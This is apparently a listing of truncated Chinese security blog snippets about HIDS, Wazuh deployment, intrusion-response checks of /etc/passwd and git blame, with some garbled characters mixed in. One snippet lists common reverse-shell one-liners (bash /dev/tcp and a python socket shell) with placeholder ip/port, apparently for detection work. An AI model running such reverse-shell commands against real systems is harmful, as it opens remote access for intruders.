加入MT剛好3個(gè)月整,來記錄一些自己的發(fā)現(xiàn)和感悟赶舆。 入職第一周-如何快速進(jìn)入工作狀態(tài) 和所有新人一樣,公司的新人培訓(xùn)計(jì)劃提供了很多了解公司以及如...
HIDS基本原理 熟悉HIDS的朋友應(yīng)該了解,服務(wù)器的shell監(jiān)控一般有兩種,一種依靠Linux的audit審計(jì)功能释树,比如Wazuh,一種是重...
我目前就職于一家私企的安全部,主要做安全審計(jì)的工作奢啥,很多公司的離職流程沒有考慮過員工的異常行為審計(jì)秸仙,18年我在逛微博的時(shí)候看到google的一條...
常見反彈: bash -i >& /dev/tcp/ip/port0>&1 python -c"import os,socket,subproc...
測試環(huán)境: CentOS Linux release 7.6.1810 Wazuh 3.10.2 1、wazuh服務(wù)器上安裝postfii及相關(guān)...
一桩盲、Wazuh 守護(hù)進(jìn)程及工具進(jìn)程 守護(hù)進(jìn)程 ossec-agentd https://documentation.wazuh.com/3.10...
Wazuh簡介 前端時(shí)間調(diào)研了一些HIDS的開源系統(tǒng): https://github.com/Neo23x0/Fenrir更加方便(不需要安裝代...
賬號排查 grep :0: /etc/passwd #檢查是否產(chǎn)生了新用戶寂纪,和UID、GID為0的用戶 stat /etc/passwd #檢查...
命令名稱: git-blame - 顯示文件的每一行最后修改的版本和作者 用法: git blame [-c] [-b] [-l...